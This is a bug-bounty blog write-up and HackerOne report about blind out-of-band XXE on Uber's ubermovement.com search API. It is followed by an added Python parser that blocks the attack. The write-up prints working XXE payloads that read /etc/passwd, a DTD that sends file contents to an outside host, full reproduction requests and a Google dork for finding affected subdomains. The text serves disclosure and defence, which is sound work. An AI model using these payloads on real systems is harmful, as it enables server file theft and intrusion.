Friday, 5 August 2016

Blind OOB XXE At UBER 26+ Domains Hacked.

XXE (XML External Entity):
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I was able to find XXE in one of Uber's websites that was in scope of its bug bounty program.

On the evening of July 26th, 2016, I was working on the ubermovement domain's web application.
As it was a small web app, there were not too many parameters to run injection tests against. I started the old-school tests, and the first parameter I came across was the search box.


Now, I attached Burp Suite, then gave a keyword to search and started monitoring the requests...

In the "search" directory I got two requests:
1. The keyword I searched: http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Now, for the first request I started attacks like XSS, SQL injection, XPath injection, XXE, command injection and many more.....

But they all failed and I didn't find any vulnerability.

Now I started my tests with the second request...

As there were no parameters, I sent the request to Repeater and started looking for directory-based vulnerabilities.

Then, as all my other injection tests had failed, I finally started looking for XXE.

So, the first thing I did was change the request method to POST and check the response.



As the response was the same as for the GET request, I added the Content-type header as application/xml
and a basic XML body with "GeneralSearch" as the search parameter, then checked the response.
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The response was shocking, as I got an XML error.

Now I was about 60% sure that it could lead to XXE. So, I started the blind tests for XXE
with different payloads...
Eg.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But still no luck; all I was getting was the XML error in the response....

Now, I thought let's check the vulnerability via an OOB (out-of-band) method and perform a ping test.

So,
step-1 : I downloaded XAMPP and hosted an Apache server.
step-2 : I port-forwarded port 80 to my machine so I could reach my server via my public IP from other networks.
step-3 : I edited the XXE payload to :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4 : Started the attack and got the error.


step-5 : I checked my server logs and found a perfect ping from the vulnerable application.




Now that the manual test had confirmed the vulnerability, I scanned the particular vulnerable request with Acunetix, and it detected the vulnerability as well.


 
Then I reported the bug first, and then started doing further tests with .dtd payloads.

It turned out that various sub-domains of *.ubermovement.com had the same flaw.

Google Dork : site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test Summary :

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/ which indicates that this script is vulnerable to XXE injection.
NOTE : As it was a blind XXE test, I was successful in the ping test for XXE but unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps To Reproduce :

  1. Go to the website : http://ubermovement.com/
  2. Attach Burp Suite and start intercepting; now click on search and search for something...
  3. Grab the GET request.

    Eg. Original HTTP Request :

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

  4. Send the request to Repeater and change the method to POST.

    Eg. HTTP Request after changing the method :

    POST /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Content-Length: 173
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

  5. Now add the content type, eg. Content-type: application/xml

    Request will be :

    POST /api/search/GeneralSearch HTTP/1.1
    Content-type: application/xml
    Host: ubermovement.com
    Content-Length: 173
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

  6. Deploy a web server and host a "payload.dtd" file, eg :

    payload.dtd :

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;

  7. Now add the XXE payload for confirmation :

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

    Request will be :

    POST /api/search/GeneralSearch HTTP/1.1
    Content-type: application/xml
    Host: ubermovement.com
    Content-Length: 214
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

NOTE : If you view your web server logs you will find a 404 error.
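The defender-side counterpart, added here and not part of the original report or the site's code: a Python stdlib parser for the GeneralSearch body that refuses any DOCTYPE before a single entity is declared, which is the same effect the disallow-doctype-decl feature gives on Java/Xerces parsers (the vulnerable server identified itself as Java/1.8.0_60). The sample bodies are constructed from the payloads shown above, so the block runs offline.

```python
import xml.parsers.expat

# Constructed sample bodies, modelled on the requests in the write-up (not captured traffic).
BENIGN_BODY = (b'<?xml version="1.0" encoding="utf-8"?>\n'
               b'<GeneralSearch>cat</GeneralSearch>')
FILE_BODY = (b'<?xml version="1.0" encoding="utf-8"?>\n'
             b'<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
             b'<GeneralSearch>&xxe;</GeneralSearch>')
OOB_BODY = (b'<?xml version="1.0" encoding="utf-8"?>\n'
            b'<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]>\n'
            b'<GeneralSearch>&dtgmlf6ent;</GeneralSearch>')


class DoctypeNotAllowed(ValueError):
    """A search body carried a DTD; a plain search term never needs one."""


def parse_general_search(body: bytes) -> str:
    """Return the text of <GeneralSearch>, refusing any document that declares a DOCTYPE.

    Rejecting the DOCTYPE itself closes every entity-based variant at once: file://
    reads, OOB callbacks, parameter-entity DTD loading and entity-expansion DoS.
    """
    parser = xml.parsers.expat.ParserCreate()
    chunks, elements = [], []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before any entity is declared, so nothing is ever resolved or fetched.
        raise DoctypeNotAllowed(f"DOCTYPE {name!r} is not permitted in a GeneralSearch body")

    def external_entity(context, base, sysid, pubid):
        # Defence in depth: never follow an external reference; returning 0 makes Expat abort.
        return 0

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.CharacterDataHandler = chunks.append
    parser.Parse(body, True)

    if elements != ["GeneralSearch"]:
        raise ValueError("body must contain exactly one <GeneralSearch> element")
    return "".join(chunks).strip()


def is_accepted(body: bytes) -> bool:
    """True if the hardened parser accepts the body, False if it rejects it."""
    try:
        parse_general_search(body)
    except (ValueError, xml.parsers.expat.ExpatError):  # DoctypeNotAllowed is a ValueError
        return False
    return True
```

With this configuration the request that produced the "perfect ping" above is rejected inside the parser, so the application never makes the outbound HTTP request that the write-up observed in its server logs.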
